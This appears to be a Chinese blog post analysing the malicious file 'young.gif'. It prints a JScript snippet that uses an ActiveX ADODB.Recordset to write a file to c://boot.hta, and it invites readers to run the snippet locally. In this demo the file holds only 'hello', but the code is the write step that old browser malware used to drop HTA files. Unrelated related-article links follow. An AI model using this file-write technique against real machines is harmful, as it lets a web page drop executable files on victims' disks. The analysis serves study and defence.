利用ADODB写文件——恶意文件young.gif代码的分析心得1

简介: 利用ADODB写文件——恶意文件young.gif代码的分析心得1

利用ADODB写文件——恶意文件young.gif代码的分析心得1

<html>



<HEAD></HEAD>



</HTML>



<SCRIPT language=JScript>



try



{



 var strHello = "hello";



 //利用ADODB写文件



 Rfuc1k1S=new ActiveXObject("ADODB.Recordset");



 Rfuc1k1S.Fields.Append("love", 200, 3000);



 mike=1;



 Rfuc1k1S.Open();



 mike=1;



 Rfuc1k1S.AddNew();



 mike=1;



 Rfuc1k1S.Fields("love").Value = strHello;



}



catch(e)



{}

 Rfuc1k1S.Update();

try
{
 Rfuc1k1S.Save("c://boot.hta" ,0); //保存为c:/boot.hta
}
catch(e)
{}
</SCRIPT>
</BODY>
</HTML>

把它复制/粘贴到记事本里,保存为HTM文件,双击运行。

看看c:/boot.hta是否出来了?

相关文章
Flex开发中使用Ant编译.mxml成.swf后,在.swf里使用Session的解决方法
Flex开发中使用Ant编译.mxml成.swf后,在.swf里使用Session的解决方法 http://iamin.blogdriver.com/iamin/1176113.html Flex Remote Object中直接使用HttpSession的方法在Flex Samples里有Session的操作使用例子:http://localhost:8080/samples/explo
1456 0
|
SQL Java 关系型数据库
[20140217]在toad使用跟踪文件.txt
[20140217]在toad使用跟踪文件.txt 我使用toad版本是12.0.0.61,今天使用生成跟踪文件,发现在界面上可以访问跟踪文件的内容做一个测试看看。
1088 0
|
SQL Oracle 关系型数据库
[20150812]关于抓取绑定变量.txt
[20150812]关于抓取绑定变量.txt --通过视图v$sql_bind_capture以及DBA_HIST_SQLBIND可以抓取到sql语句的绑定变量。
791 0
|
存储 Web App开发 文件存储
ie6不支持PNG图片解决办法(季雨林代码收集)
PNG图像格式介绍: PNG是20世纪90年代中期开始开发的图像文件存储格式,其目的是企图替代GIF和TIFF文件格式,同时增加一些GIF文件格式所不具备的特性。流式 网络图形格式(Portable Network Graphic Format,PNG)名称来源于非官方的“PNG’s Not GIF”,是一种位图文件(bitmap file)存储格式,读成“ping”。PNG用来存储灰度
1158 0
|
安全 前端开发
[PiKaChu靶场通关]不安全文件下载---Unsafe Filedownload
[PiKaChu靶场通关]不安全文件下载---Unsafe Filedownload
250 0
[PiKaChu靶场通关]不安全文件下载---Unsafe Filedownload

热门文章

最新文章